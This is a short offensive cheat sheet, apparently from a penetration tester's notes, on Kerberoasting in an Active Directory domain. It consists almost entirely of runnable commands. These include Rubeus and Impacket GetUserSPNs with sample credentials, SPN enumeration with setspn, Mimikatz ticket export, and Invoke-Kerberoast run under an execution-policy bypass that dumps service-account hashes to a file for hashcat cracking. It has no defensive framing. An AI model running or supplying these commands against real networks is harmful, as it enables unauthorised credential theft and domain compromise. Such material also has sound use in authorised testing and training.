If an account has SPN (Service Principal Name) set. We can request that account hash and try to crack it locally
For kerberos to work, times have to be within 5 minutes between attacker and victim.
.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap
There are many ways to do it.
setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request -target-domain ecorp.local ecorp/morph3:Password123@10.10.10.21 -dc-ip 10.10.10.21
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"
Invoke-Mimikatz -Command '"kerberos::list /export"'
This powershell script is always my go to. It works pretty fine
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerberoast.txt